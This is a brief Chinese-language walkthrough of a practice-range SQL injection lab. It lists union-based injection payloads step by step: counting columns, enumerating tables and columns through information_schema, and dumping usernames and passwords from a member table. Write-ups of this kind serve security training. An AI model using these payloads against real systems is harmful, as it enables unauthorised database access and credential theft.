靶场地址:
https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe
既然靶场已经提示是字符型注入,那就不测试是什么型注入了
查询列表有几列,并且第几列是回显在页面的
id=tingjigonggao' and 1=2 union select 1,2,3,4%23
,有4列,2,3列回显在页面
查看数据库名及表名
id=tingjigonggao' and 1=2 union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()%23
查看stormgroup_member表字段名
id=tingjigonggao' and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='stormgroup_member
查找status为1的用户名和密码
id=tingjigonggao' and 1=2 union select * from stormgroup_member where status=1%23
网友评论